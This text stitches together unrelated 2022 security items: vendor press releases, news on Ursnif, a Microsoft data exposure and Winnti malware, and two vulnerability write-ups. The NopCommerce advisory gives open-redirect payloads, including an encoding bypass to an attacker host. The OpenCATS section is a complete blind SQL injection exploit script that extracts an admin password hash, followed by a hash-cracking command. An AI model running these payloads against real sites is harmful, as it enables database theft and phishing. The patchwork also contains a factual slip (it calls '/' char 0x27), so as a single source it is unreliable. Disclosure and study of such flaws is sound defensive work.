Bolster delivers intelligence and remediation across web, social media, app stores, and Dark Web, with 24/7, live SOC support.

**Los Altos, CA- October 20, 2022 —** Bolster, Inc., the automated digital risk protection company, today announced the addition of Dark Web Intelligence and 24/7 support. Bolster’s new Dark Web offering is the easiest to use actionable threat solution on the market - adding to the value of the entire Bolster product portfolio. Customers will have access to a comprehensive platform able to monitor and protect their brand across the web, social media, app stores and dark web; with access to experts 24/7.

Designed for actionable insight, Bolster’s Dark Web monitoring allows organizations to gather threat intelligence across the dark web and predict how threat actors will behave and act. Organizations can discover hacking tools, exploit kits, relevant chatter and how that affects a brand. The Bolster platform offers automated and curated responses that deliver the most effective risk mitigation strategy internally.

“Because the dark web can be a place of great intelligence on pre and post breach information, having dark web monitoring is essential to understanding threats to your brand,” said Abhishek Dubey, co-founder and CEO of Bolster, Inc. “We have designed our solution to be completely actionable by allowing customers to create curated, automated workflows when they spot a certain type of alert or activity. This allows for an easy method of both obtaining instant insight and responding quickly and effectively to threats.”

When a threat or suspicious activity is discovered, customers now have the ability to call a security expert 24/7 and 365 days a year. The 24/7 support offering provides the following services:

*   **Around the Clock Support:** Whether it be active online threats or questions about reporting, Bolster’s 24 hour, 7 days a week, 365 days a year SOC team support will put customers in direct contact with a security expert.

*   **Strategic Planning:** A dedicated, curated quarterly business review and executive reporting will be available to provide consulting, configuration strategies, best practices, strategic adversary services, and more. Strategic planning will help organizations plan for and mitigate future risks.

*   **Expert Management:** Bolster managed services allow customers to focus on their core business objectives while they handle the detection, monitoring, and takedown of threats to brands. Customers will have a trusted team of experts to navigate the digital risk landscape.

With dark web intelligence and around the clock expert support built into the Bolster platform, customers have the one consistent, intuitive experience to track threats across any online channel. Ease of use and a hands-off remediation process will help ease training and administration as well as refocus IT resources to other core business objectives. Bolster offers the industry’s best user experience for detecting, monitoring, and remediating digital risk.

For more information on Bolster, please visit: https://bolster.ai/

**About Bolster, Inc.**  

At Bolster, our mission is to make the internet safe for everyone. That's why we created the first and only fully automated platform purpose-built from the ground up to detect, monitor, and take down fraudsters on the Internet. We call it Automated Digital Risk Protection. Our comprehensive platform offers the most efficient protection across web, social media, app stores and the dark web to combat fraudulent sites and content. Bolster was founded in 2017 by security industry veterans with headquarters in Los Altos, CA. To learn more, go to www.bolster.ai.

Bolster Deepens Platform with Dark Web Threat Intelligence and 24/7 Support

Multiple open redirect vulnerabilities in NopCommerce 4.10 through 4.50.1 allow remote attackers to conduct phishing attacks by redirecting users to attacker-controlled web sites via the returnUrl parameter, processed by the (1) ChangePassword function, (2) SignInCustomerAsync function, (3) SuccessfulAuthentication method, or (4) NopRedirectResultExecutor class.

**Info**

Multiple Open Redirects in NopCommerce

Software Link

NopCommerce Web Platform

Affected Versions

4.10 - 4.50.1

Tested on

NopCommerce 4.40, 4.50.1

Vulnerable Components

src/Presentation/Nop.Web.Framework/Mvc/Routing/NopRedirectResultExecutor.cs,  
src/Presentation/Nop.Web/Controllers/CustomerController.cs,  
src/Libraries/Nop.Services/Customers/CustomerRegistrationService.cs,  
src/Libraries/Nop.Services/Authentication/External/ExternalAuthenticationService.cs

CVSS 3.0

CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:N/I:L/A:N

CVE

CVE-2022-26954

**Summary**

Multiple flaws in the handling of returnurl parameter allow for multiple open redirects in the application that may be abused by an attacker to construct successful phishing campaigns on application users by crafting URLs of legitimate application that will seamlessly redirect users to attacker-controlled resources.

**Fix**

The issue was fixed in the minor NopCommerce 4.50.2 release on April 14th 2022.

Code commit with corresponding fixes

**Details**

The NopCommerce web application uses the UrlHelper.IsLocalUrl built into the C# framework to prevent open redirections when handling user-supplied URL path parameters, such as returnUrl.

...
//prevent open redirection attack
if (!Url.IsLocalUrl(returnUrl))
    return RedirectToAction("Index", "Home", new { area \= AreaNames.Admin });

return Redirect(returnUrl);
...

_Code snippet illustrating checks over returnUrl parameter prior to the redirection_

However, this defence mechanism is not consistently implemented within the application controllers. In particular, the following controller methods are missing the functionality:

*   ChangePassword (src/Presentation/Nop.Web/Controllers/CustomerController.cs)
    
    \[HttpPost\]
    public virtual async Task<IActionResult\> ChangePassword(ChangePasswordModel model, string returnUrl)
    {
      ...
    	if (changePasswordResult.Success)
      {
          \_notificationService.SuccessNotification(await \_localizationService.GetResourceAsync("Account.ChangePassword.Success"));
          return string.IsNullOrEmpty(returnUrl)  ? View(model) : new RedirectResult(returnUrl);
      }
      ...
    }
    
*   SignInCustomerAsync (src/Libraries/Nop.Services/Customers/CustomerRegistrationService.cs)
    
    public virtual async Task<IActionResult\> SignInCustomerAsync(Customer customer, string returnUrl, bool isPersist \= false)
    {
        ...
        //redirect to the return URL if it's specified
        if (!string.IsNullOrEmpty(returnUrl))
            return new RedirectResult(returnUrl);
    
        return new RedirectToRouteResult("Homepage", null);
    }
    
*   SuccessfulAuthentication (src/Libraries/Nop.Services/Authentication/External/ExternalAuthenticationService.cs)
    
    protected virtual IActionResult SuccessfulAuthentication(string returnUrl)
    {
        //redirect to the return URL if it's specified
        if (!string.IsNullOrEmpty(returnUrl))
            return new RedirectResult(returnUrl);
    
        return new RedirectToRouteResult("Homepage", null);
    }
    

The aforementioned methods do not contain any checks over the user supplied value, and thus are vulnerable to the open redirects. Open redirects can be triggered by sending the following requests to the application:

_An up-to-date build (on 17.02.2022) from the official NopCommerce GitHub was used to demonstrate the issue_

    POST /login?returnurl=https://google.com HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 242
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/login?returnUrl=https://google.com
    Cookie: COOKIES
    
    Email=EMAIL&Password=PASS&__RequestVerificationToken=CSRF_TOKEN&RememberMe=false
    
    HTTP/1.1 302 Found
    Content-Length: 0
    Connection: close
    Date: Thu, 17 Feb 2022 08:11:48 GMT
    Server: Kestrel
    Cache-Control: no-cache,no-store
    Content-Language: en-US
    Expires: Thu, 01 Jan 1970 00:00:00 GMT
    Location: https://google.com
    

_Open redirect after a successful login_

    POST /customer/changepassword?returnUrl=https://google.com HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 318
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/customer/changepassword
    Cookie: COOKIES
    Upgrade-Insecure-Requests: 1
    
    OldPassword=OLD_PASS&NewPassword=NEW_PASS&ConfirmNewPassword=NEW_PASS&__RequestVerificationToken=CSRF_TOKEN
    
    HTTP/1.1 302 Found
    Content-Length: 0
    Connection: close
    Date: Thu, 17 Feb 2022 09:02:15 GMT
    Server: Kestrel
    Content-Language: en-US
    Location: https://google.com/
    X-MiniProfiler-Ids: ["9d6e3a1a-9f9f-4caa-ae31-35b2332ce128"]
    

_Open redirect after a successful password change_

Furthermore, a flaw in a custom RedirectResultExecutor class, used to handle all HTTP redirects in the application, can be abused to **bypass any defence mechanisms and perform open redirects in any application controllers that use client-side supplied input (e.g., in returnUrl) to perform the redirect**.

The issue is exploitable in all versions from commit #2731 Add URL encoding on redirection to URL with non-ASCII chars(January 23, 2018) to commit #3192 Fixed URL encoding on redirect (November 24, 2021).

Code of the vulnerable NopRedirectResultExecutor.ExecuteAsync method, located in src/Presentation/Nop.Web.Framework/Mvc/Routing/NopRedirectResultExecutor.cs, is shown below:

/// <summary\>
/// Execute passed redirect result
/// </summary\>
/// <param name\="context"\>Action context</param\>
/// <param name\="result"\>Redirect result</param\>
/// <returns\>A task that represents the asynchronous operation</returns\>
public override Task ExecuteAsync(ActionContext context, RedirectResult result)
{
    if (result \== null)
        throw new ArgumentNullException(nameof(result));

    if (\_securitySettings.AllowNonAsciiCharactersInHeaders)
    {
        //passed redirect URL may contain non-ASCII characters, that are not allowed now (see https://github.com/aspnet/KestrelHttpServer/issues/1144)
        //so we force to encode this URL before processing
        result.Url \= WebUtility.UrlDecode(result.Url);
    }

    return base.ExecuteAsync(context, result);
}

The application URL-decodes the returnUrl parameter and puts it directly into the Location header of the response served to the client.

Any preceding IsLocalUrl checks can be effectively ignored by adding the second / character (char 0x27) in double-URI encoding.

For example, the payload returnUrl=%2f%252fgoogle.com will undergo the following processing:

1.  The application web server will natively decode the first layer of URL encoding and pass it to the controller:
    
    %2f%252fgoogle.com --> /%2fgoogle.com
    
2.  The controller will perform the IsLocalUrl check over the /%2fgoogle.com value:
    
    Since the second / is still being encoded as %2f , the function will return true:
    
    IsLocalUrl("/%2fgoogle.com") --> true
    
3.  The /%2fgoogle.com value will be used to call Redirect function
    
4.  The /%2fgoogle.com value will be processed by the NopRedirectResultExecutor, once more decoded into //google.com, and directly served in the Location header:
    
    result.Url \= WebUtility.UrlDecode(result.Url); // will result in "//google.com"
    ...
    return base.ExecuteAsync(context, result);
    

    [*] returnUrl value: "/%2fgoogle.com"
    [+] result.Url value: "//google.com"
    

_Verbose printing of local variables inside the NopRedirectResultExecutor during processing of an attacker-injected value_

Thus, it is possible to achieve the following server behavior in all client-side controlled redirects:

    POST /en/login?returnurl=%2F%252fATTACKER_HOST HTTP/2
    Host: localhost
    Cookie: COOKIES
    User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:97.0) Gecko/20100101 Firefox/97.0
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 249
    
    Username=USER&Password=PASS&__RequestVerificationToken=CSRF_TOKEN&RememberMe=false
    
    HTTP/2 302 Found
    Date: Tue, 15 Feb 2022 20:48:29 GMT
    Content-Length: 0
    Cache-Control: no-cache
    Pragma: no-cache
    Expires: Thu, 01 Jan 1970 00:00:00 GMT
    Location: //ATTACKER_HOST
    

A Location header value of //ATTACKER_HOST is actually a valid, shortened form of CURRENT_URI_SHEME://ATTACKER_HOST and will be successfully processed and followed to by modern browsers.

NopRedirectResultExecutor was partially fixed in BugFix #3192 and now uses extra processing before returning the value to the client:

/// <summary\>
/// Execute passed redirect result
/// </summary\>
/// <param name\="context"\>Action context</param\>
/// <param name\="result"\>Redirect result</param\>
/// <returns\>A task that represents the asynchronous operation</returns\>
public override Task ExecuteAsync(ActionContext context, RedirectResult result)
{
    if (result \== null)
        throw new ArgumentNullException(nameof(result));

    if (\_securitySettings.AllowNonAsciiCharactersInHeaders)
    {
        //passed redirect URL may contain non-ASCII characters, that are not allowed now (see https://github.com/aspnet/KestrelHttpServer/issues/1144)
        //so we force to encode this URL before processing
        var url \= WebUtility.UrlDecode(result.Url);

        var urlHelper \= result.UrlHelper ?? \_urlHelperFactory.GetUrlHelper(\_actionContextAccessor.ActionContext);
        
				var isLocalUrl \= urlHelper.IsLocalUrl(url);

        var uri \= new Uri(isLocalUrl ? $"{\_webHelper.GetStoreLocation().TrimEnd('/')}{url}" : url, UriKind.Absolute);
        
        result.Url \= isLocalUrl ? uri.PathAndQuery : $"{uri.GetLeftPart(UriPartial.Query)}{uri.Fragment}";      
		}
    return base.ExecuteAsync(context, result);
}

The following mutations are performed on the attacker-injected /%2fgoogle.com value:

1.  The application URL-decodes the returnUrl parameter value into a url variable.
2.  The url is checked with the built-in IsLocalUrl helper check to determine if it is relative or not.
3.  The check returns false on the decoded value//google.com , and the url is then processed as external.
4.  The application then initiates a new uri variable that uses the built-in Uri class to process the //google.com value as an absolute URL. The Uri class constructor, due to the lack of a URI scheme, will treat the value as local path and prepends a file:// schema.
5.  The uri variable is converted back to string.
6.  The resulting value is served to the client in the Location header.

Although the core weakness with bypassing the preceding IsLocalUrl checks on returnUrl values still can be exploited by an attacker to achieve an open redirect, the file:// schema that is now returned back to the browser has almost no practical impact, as it is likely ignored by the browsers’ security policies (ERROR_INSECURE_REDIRECT). However, the issue can still affect HTTP clients that use the native API for communication and data processing.

    [*] returnUrl value: "/%2fgoogle.com"
    [*] url value: "//google.com"
    [?] isLocalUrl value: False
    [*] uri value: Uri(file://google.com/)
    [+] Resulting redirect URI value: Uri(file://google.com/)
    

_New behavior processing logs from supplying /%252fgoogle.com into the returnUrl_

    POST /login?returnurl=/%252fgoogle.com HTTP/1.1
    Host: localhost
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 252
    Cookie: COOKIES
    
    Email=EMAIL&Password=PASS&__RequestVerificationToken=CSRF_TOKEN&RememberMe=false
    
    HTTP/1.1 302 Found
    Content-Length: 0
    Connection: close
    Date: Tue, 15 Feb 2022 20:40:34 GMT
    Server: Kestrel
    Expires: Thu, 01 Jan 1970 00:00:00 GMT
    Location: file://google.com/
    

_New NopRedirectResultExecutor behavior on local instance of the up-to-date (17.02.2022) application compiled from GitHub source code_

CVE-2022-26954: [CVE-2022-26954] Multiple Open Redirects in NopCommerce

The Ursnif malware has become the latest malware to shed its roots as a banking trojan to revamp itself into a generic backdoor capable of delivering next-stage payloads, joining the likes of Emotet, Qakbot, and TrickBot.
"This is a significant shift from the malware's original purpose to enable banking fraud, but is consistent with the broader threat landscape," Mandiant researchers Sandor

The Ursnif malware has become the latest malware to shed its roots as a banking trojan to revamp itself into a generic backdoor capable of delivering next-stage payloads, joining the likes of Emotet, Qakbot, and TrickBot.

"This is a significant shift from the malware's original purpose to enable banking fraud, but is consistent with the broader threat landscape," Mandiant researchers Sandor Nemes, Sulian Lebegue, and Jessa Valdez disclosed in a Wednesday analysis.

The refreshed and refactored variant, first spotted by the Google-owned threat intelligence firm in the wild on June 23, 2022, has been codenamed LDR4, in what's being seen as an attempt to lay the groundwork for potential ransomware and data theft extortion operations.

Ursnif, also called Gozi or ISFB, is one of the oldest banker malware families, with the earliest documented attacks going as far back as 2007. Check Point, in August 2020, mapped the "divergent evolution of Gozi" over the years, while pointing out its fragmented development history.

Almost a year later in late June 2021, a Romanian threat actor, Mihai Ionut Paunescu, was arrested by Colombian law enforcement officials for his role in propagating the malware to no fewer than a million computers from 2007 to 2012.

The latest attack chain detailed by Mandiant demonstrates the use of recruitment and invoice-related email lures as an initial intrusion vector to download a Microsoft Excel document, which then fetches and launches the malware.

The major refurbishment of Ursnif eschews all its banking-related features and modules in favor of retrieving a VNC module and gaining a remote shell into the compromised machine, which are carried out by connecting to a remote server to obtain said commands.

"These shifts may reflect the threat actors' increased focus towards participating in or enabling ransomware operations in the future," the researchers said.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

New Ursnif Variant Likely Shifting Focus to Ransomware and Data Theft

The data exposure was the result of an "unintentional misconfiguration on an endpoint" and not a security vulnerability, Microsoft said.

Sensitive information for some Microsoft customers were exposed by a misconfigured server, Microsoft Security Response Center said on Wednesday. The misconfigured endpoint was accessible on the Internet and did not require authentication.

The exposed information included names, email addresses, email content, company name, phone numbers, and files "relating to business between a customer and Microsoft or an authorized Microsoft partner," the company said. The endpoint has already been secured to require authentication, and affected customers have been notified.

"This misconfiguration resulted in the potential for unauthenticated access to some business transaction data corresponding to interactions between Microsoft and prospective customers, such as the planning or potential implementation and provisioning of Microsoft services," Microsoft said, noting that there is no indication that customer accounts or systems had been compromised.

Microsoft learned of the misconfiguration on Sept. 24 from a research team at SOCRadar.

SOCRadar's researchers claimed in their own blog post to have found 2.4TB of emails and project files containing Statement of Work documents, product orders, project details, personally identifiable information, invoices, price lists, and "documents that may reveal intellectual property." The researchers claimed the exposed information could be linked to more than 65,000 entities from 111 countries.

Microsoft said SOCRadar "greatly exaggerated the scope of this issue" and did not account for duplicate records in its estimate of affected entities. Microsoft also said SOCRadar's decision to release a search tool to look through the files "is not in the best interest of ensuring customer privacy or security and potentially exposing them to unnecessary risk."

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Microsoft Customer Data Exposed by Misconfigured Server

On specific hardware platforms, on BIG-IP versions 16.1.x before 16.1.3.1, 15.1.x before 15.1.7, 14.1.x before 14.1.5.1, and all versions of 13.1.x, while Intel QAT (QuickAssist Technology) and the AES-GCM/CCM cipher is in use, undisclosed conditions can cause BIG-IP to send data unencrypted even with an SSL Profile applied.

CVE-2022-41983

OpenCATS v0.9.6 was discovered to contain a SQL injection vulnerability via the tag_id variable in the Tag update function.

**SQL injection vulnerability in OpenCats 'Tag' update functionality.**

OpenCats version 0.9.6 PHP7.2 suffers from SQL injection vulnerability. This allows attackers control over the application's database.

User has control over tag\_id variable, which allows SQL injection in UPDATE statement via time-based/blind techniques.

Application builds the following query:  
UPDATE tag SET title = 'Title', description = 'Description' WHERE tag_id = XXX AND site_id = 1;

User has control over XXX part.

1337 OR 1337=(select IF(substr(database(),1,1)='a',(select sleep(3)), (select sleep(1)))))

With this payload, application will sleep for 3 seconds for every entry inside original table if the database() query result starts with 'a', otherwise it will sleep for one second.

With this time-based blind technique, attacker is able to exfiltrate any information from the database by querying many YES/NO questions to the database and intelligently measuring response times.

**POC**

This proof of concept exfiltrates administrator user's password hash:  
(select password from user where user_id=1)

**Bonus, let's crack the hash**

echo "password:21232f297a57a5a743894a0e4a801fc3" > hash.txt  
john --wordlist=/usr/share/wordlists/rockyou.txt --format=Raw-MD5 hash.txt

**xploit.py!**

import requests
import string
import sys

def inRange(rTime, averageTime, sleepAmount):
    if(rTime \> sleepAmount and rTime < rTime + (averageTime\*20/100) and rTime \> rTime \- (averageTime\*20/100)):
        return True
    else: return False

headers \= {}
proxies \= {}
#proxies\["http"\] = "http://127.0.0.1:8080"

#Login and get session cookie..
#Change this
headers\["Cookie"\] \= "CATS=cl2201l24aihqlnch0jgnr4pd2"
url \= "http://192.168.203.135/opencats/index.php?m=settings&a=ajax\_tags\_upd"

#Prepare Content-Type for POST request compability
headers\["Content-Type"\] \= "application/x-www-form-urlencoded"
#Prepare POST parameter 'tag\_id'
postdata \= "tag\_id=PWN&tag\_title=test"

#Change this depending on the endpoint
tempPayload \= "1 OR 1=(sleep(3))"

print("Sending few request to determine average response time...")

timeSum \= 0
numberOfBaselineRequests \= 5
for i in range(numberOfBaselineRequests):
    try:
        rTest \= requests.post(url, headers \= headers, data\=postdata.replace('PWN','1337'), proxies \= proxies) 
        timeSum  += rTest.elapsed.total\_seconds()
        if('<form name="loginForm"' in rTest.text):
            print("Session cookie not valid, change it inside .py")
            sys.exit(\-1)
    except:
        print("Some exception ocurred while sending or receiving data from the application. Make sure IP is good. Exiting..")
        sys.exit(\-1)

averageTime \= timeSum/numberOfBaselineRequests
print("Average response time for " + str(numberOfBaselineRequests) + " requests is : " + str(averageTime))

print("\\nTrying to inject sleep(3)")
r \= requests.post(url, headers \= headers, data \= postdata.replace('PWN',tempPayload), proxies \= proxies)
rTime \= r.elapsed.total\_seconds()
print("Response time: " + str(rTime))

if(inRange(rTime, averageTime, 3)):
    print("\\n\[+\] Application is vulnerable to SQL injection...")

#Getting value for false statement -> sleep(1)
tempPayload2 \= "1 or 1=(sleep(0.1))"
r2 \= requests.post(url, headers \= headers, data \= postdata.replace('PWN',tempPayload2), proxies \= proxies)
t\_sleep\_one \= r2.elapsed.total\_seconds()

tempPayload3 \= "1 or 1=(sleep(0.3))"
r3 \= requests.post(url, headers \= headers, data\=postdata.replace('PWN', tempPayload3), proxies \= proxies)
t\_sleep\_three \= r3.elapsed.total\_seconds()

print("False statement time: " + str(t\_sleep\_one))
print("True statement time: " + str(t\_sleep\_three) + "\\n")

length \= 0
exfilQuery \= "1 OR 1=(IF(length((select password from user where user\_id=1))='XXX',sleep(0.3),sleep(0.1)))"
#Determine length of the result that we want. i.e select passwrod from user query...
print("Determining the result length of our query...")

while(True):
    q \= exfilQuery.replace('XXX', str(length))
    r \= requests.post(url, headers \= headers, data \= postdata.replace('PWN', q))
    time \= r.elapsed.total\_seconds()

    #If sleep(3) gets executed, we have correct length
    if(time \> (t\_sleep\_one+(t\_sleep\_one\*20/100))):
        print("Got length " + str(length))
        break
    
    length += 1
    if(length \== 1000):
        break
    
if(length \== 0 or length \== 1000):
    print("Something is wrong. Exiting...")
    sys.exit(\-1)
else: print("Length of '(select password from user where user\_id=1)' query: " + str(length))

#OK----|
alphanumerics \= list(string.ascii\_lowercase + string.digits)
exfilQuery \= "1 OR 1=(IF(substr((select password from user where user\_id=1),YYY,1) = 'XXX',sleep(0.3), sleep(0.1)))"

data \= \[\]
print("Exfiltrating data. Query: (select password from user where user\_id=1). Patience...")

for i in range(length):
    for item in alphanumerics:
        q \= exfilQuery.replace('XXX',str(item))
        q \= q.replace('YYY',str(i+1))
        r \= requests.post(url, headers \= headers, data \= postdata.replace('PWN',q), proxies \= proxies)
        time \= r.elapsed.total\_seconds()
        #print(str(time) + "\\n")
        if(time \> (t\_sleep\_one+(t\_sleep\_one\*20/100))):
            print(str(i+1) + ". Letter = " + item)
            data.append(item)
            break

print("(select password from user where user\_id=1) -> " + "".join(data))

CVE-2022-43020: opencats_zero-days/SQLI_in_Tag_Updates.md at main · hansmach1ne/opencats_zero-days

New version boosts VPN tunnel performance and lets users prioritize secure connection traffic for certain services.

**Woburn, Mass., Oct. 19, 2022** — Today Kaspersky unveiled a new version of Kaspersky VPN Secure Connection, which introduces a dramatic 200% boost in VPN tunnel performance, compared to 2020. A split-tunneling feature grants users the ability to prioritize secure connection traffic for certain services, while a VPN-for-routers capability automatically re-routes any connected device at home.

Global VPN usage is on the rise, with the market set to reach a colossal $77.1 billion by 2026. This comes as no surprise, since installing a VPN provides a quick and easy way to improve security and prevent data from falling into the wrong hands. It does this by routing data through an encrypted tunnel, which hides the IP address and makes it look as though the connection has come from elsewhere.

Alongside the performance increase, the updated Kaspersky VPN Secure Connection’s split-tunnelling feature allows users to select exactly what traffic goes through the VPN. This will help to achieve better performance, letting the user prioritize high-bandwidth traffic, focus on data in sensitive apps, and disable the VPN for other apps that might be reliant on location data.

The geography of servers within Kaspersky VPN Secure Connection has also been greatly increased, now offering 86 locations across 68 regions. This lets users access a wider range of content on the biggest global streaming services, including Netflix, Hulu, Amazon Prime, HBO Max, Disney+ and BBC iPlayer. An intuitive new function of the VPN helps customers to pick the best location for a particular task by recommending the one that provides the best performance level for either streaming or torrenting.

Additionally, the VPN for routers now allows all devices connected to home Wi-Fi to run through the VPN automatically, without having to set up each one individually. This feature is particularly useful for smart TVs, smart locks, and other smart home gadgets, on which a user cannot install a VPN directly, therefore providing uninterrupted privacy and security to these devices.

“As people continue to work from home and spend more time online, an increased importance is placed on keeping their data private as well as securing connected home devices,” said Marina Titova, vice president, consumer product marketing at Kaspersky. “To support consumers with their needs, we’ve invested a lot into improvement of our Kaspersky VPN. As a result, consumers can experience boosted VPN tunnel performance, with a 200% increase compared to 2020. The VPN also sees new features and better UX to ensure speed, privacy and high performance across all home devices.”

The new Kaspersky VPN Secure Connection is available now. To find out more about the product, visit this page.

****About Kaspersky****

Kaspersky is a global cybersecurity and digital privacy company founded in 1997. Kaspersky’s deep threat intelligence and security expertise is constantly transforming into innovative security solutions and services to protect businesses, critical infrastructure, governments and consumers around the globe. The company’s comprehensive security portfolio includes leading endpoint protection and a number of specialized security solutions and services to fight sophisticated and evolving digital threats. Over 400 million users are protected by Kaspersky technologies and we help 240,000 corporate clients protect what matters most to them. Learn more at usa.kaspersky.com.

Kaspersky Launches New VPN to Amplify Speed and Convenience

Training service prepares ransomware response teams for successful threat actor engagement to mitigate damage, protect brand reputation, anticipate emerging threats, and more.

**Arlington, Va., Oct. 19, 2022 –** GroupSense, a digital risk protection services company, today announced the launch of a new Ransomware Negotiation Training service offering. During an immersive three-day, in-person training session, participants will learn the proper strategies to combat the negative consequences of an attack from negotiation experts at both GroupSense and Max Negotiating, a negotiation advisory firm that specializes in training lawyers and legal professionals. As a result of the training, participants will be able to help their client organizations identify threat actors, learn key cyber negotiation principles and strategies, protect brand reputation, avoid unnecessary business losses and stay ahead of emerging threats.

According to the Federal Bureau of Investigation’s Internet Crime Complaint Center, ransomware complaints increased 62% from 2020 to 2021. The increase in attacks makes negotiation with threat actors a crucial part of enabling an organization to resume operations, reducing permanent data loss and eliminating regulatory fines and penalties. While response teams, typically led by lawyers, are accustomed to negotiating on their client’s behalf, many have never communicated directly with threat actors or conducted negotiations under the constraints they impose. With GroupSense’s Ransomware Negotiation Training, participants will discover the ins-and-outs of ransomware attacks, the intricacies of threat actor engagement, discern their role in a ransomware negotiation and master a proactive ransomware response strategy.

“The business impact of a ransomware attack can be severe – revenue loss, brand and reputation damage, operational and business disruption, increased cyber insurance premiums and legal consequences,” said Maxwell Bevilacqua, chief negotiating officer of Max Negotiating. “By teaming up with GroupSense, we’re able to pair their expert ransomware negotiators with our negotiation experts to help clients - such as lawyers and law firms with cybersecurity practices - better understand the art and science of negotiation with threat actors so they can minimize damage to their companies.”

As part of the three-day training, GroupSense and Max Negotiating design a case simulation according to the structure of the client’s organization, putting the client’s response team through a fire drill to consolidate their strengths and highlight vulnerabilities, and prepare the team for worst-case scenarios. The agenda for the training is as follows:

*   **Day 1** – Participants begin by learning the anatomy of a ransomware attack, including how they are conducted, the roles involved and the ransomware ecosystem. Next, the GroupSense and Max Negotiating team provides a framework for conducting ransomware negotiations and delves into core principles as they apply to cybercrime and ransomware.
*   **Day 2** – The framework is then put to the test in a complex, dynamic, multi-party simulation of a ransomware attack. The simulation is recorded for future review and coaching on the third day.
*   **Day 3** – The team provides feedback as participants review recordings of the previous day’s negotiation simulation. The team leads participants in exercises to strengthen the vulnerabilities identified in the simulation. The training is then concluded by building out a team response plan.

After the training program, client organizations will have access to the video recordings as well as the Max Negotiating digital toolkit. They will also have the opportunity to engage in additional ransomware negotiation training and coaching opportunities from both GroupSense and Max Negotiating.

“Over the last three years, our ransomware experts have conducted some of the world’s largest ransomware and extortion negotiations, giving them in-depth practical knowledge of the process and the ability to develop a proven negotiation method that has garnered best-case outcomes for our clients,” said Kurtis Minder, co-founder and CEO, GroupSense. “We partnered with Max Negotiating to combine our field experience with their deep knowledge of the negotiation process to help response teams reduce panic and decision fatigue during a ransomware attack, to arm them with the skills to remain in control of the situation, and to provide the tools they need to engage successfully with threat actors and facilitate a positive outcome.”

In addition to the new Ransomware Negotiation Training offering, GroupSense has additional ransomware offerings, including its Ransomware Response Readiness Assessment (R3A) and Ransomware Negotiation Services. Additional services include ransomware incident support, post-incident monitoring and breach notification services. GroupSense also provides a ransomware hotline (1-800-484-9426) for companies to speak to an expert negotiator if they’ve been affected by ransomware.

For more information about GroupSense’s Ransomware Negotiation Training offering, download the data sheet, and to inquire about pricing, please contact \[email protected\].

**About GroupSense**

GroupSense is a digital risk protection services company delivering customer-specific intelligence to dramatically improve enterprise cybersecurity and fraud-management operations. Unlike generic cyber-intelligence vendors, GroupSense uses a combination of automated and human reconnaissance to create finished intelligence mapping each customer’s specific digital business footprint and risk profile. This enables customers to immediately use GroupSense’s intelligence to reduce enterprise risk, without requiring any additional processing or management by overstretched security and fraud-prevention teams. GroupSense is based in Arlington, Va., with a growing customer base that includes large enterprises, state and municipal governments, law enforcement agencies and more.

GroupSense Delivers New Ransomware Negotiation Training Service

The Winnti APT was spotted dropping several variants of Spyder Loader and other malware as part of the so-called Operation Cuckoobees.

The Winnti cyber-espionage group out of China was discovered deploying the Spyder Loader malware as part of an ongoing campaign to gather intelligence information on government organizations in Hong Kong.

Researchers at Symantec's Threat Hunter Team recently observed malicious activity in which attackers remained active on some targeted networks for more than a year to steal critical data in what they believe is an extension of the group's previously identified Operation Cuckoobees, they said in a blog post published this week.

"While we did not see the ultimate payload in this campaign, based on the previous activity seen alongside the Spyder Loader malware it seems likely the ultimate goal of this activity was intelligence collection," researchers wrote.

Researchers at Cybereason first identified the Cuckoobees campaign in May as a massive cyber-espionage campaign against manufacturing and technology companies in North America and Asia that had been stealing immense stores of intellectual property and other sensitive data for years when it was discovered.

At that time, researchers estimated that Winnti — aka APT41, Wicked Panda, and Barium — so far had stolen hundreds of gigabytes of data, including trade secrets, blueprints, formulas, diagrams, and proprietary manufacturing documents, from more than 30 global organizations. They also harvested details about a target organization's network architecture, user accounts, credentials, customer data, and business units to leverage in future attacks.

The latest activity against Hong Kong organizations appears to be part of that broad campaign, which is likely to continue and ensnare more victims in its cyber-espionage web before it's over, researchers said. "The fact that this campaign has been ongoing for several years … indicates that the actors behind this activity are persistent and focused adversaries, with the ability to carry out stealthy operations on victim networks over a long period of time," they wrote.

**Unpacking a Trojan**

During the activity they observed Symantec researchers got a good look under the hood at Spyder Loader, which Winnti already had been spotted using as the initial payload in previous malicious activity.

Researchers at SonicWall were the first to discuss the malware publicly in March 2021, according to Symantec, which is part of Broadcom Software. At the time researchers identified the malware being used for targeted attacks on information storage systems to collect information about corrupted devices, execute mischievous payloads, coordinate script execution, and communicate with command and control systems, they said in their report.

The malware later was spotted being used in the Cuckoobees campaign and now again against Hong Kong organizations, with various variants being deployed this time around. All of them "displayed largely the same functionality" to load next-stage payloads and perform functions similar to those described by SonicWall, using obfuscation to hide malicious activity, the researchers said.

Winnti is believed to be working on behalf of, or with the support of, the Chinese government since at least 2010. Some security vendors have described Winnti as an umbrella group comprised of multiple threat actors operating under the control of China's state intelligence agencies.

In addition to Cuckoobees, Winnti also has been linked to attacks in 2010 on scores of US firms that included such heavy-hitters as Google and Yahoo. Its activity eventually led the US government to indict five members of the threat group, which in the end did little to stop its malicious activities.

**Technical Details**

Symantec researchers analyzed a sample of Spyder Loader compiled as a 64-bit PE DLL, a modified copy of sqlite3.dll with the addition of a malicious export, sqlite3\_prepare\_v4, which expects a string as its third argument, they said.

"Reportedly, whenever an export is executed by rundll32.exe, the third argument of the called export should contain part of the process command-line," researchers explained. "When this loader is executed, it extracts the file name from its third argument, and the referred file is expected to contain a sequence of records."

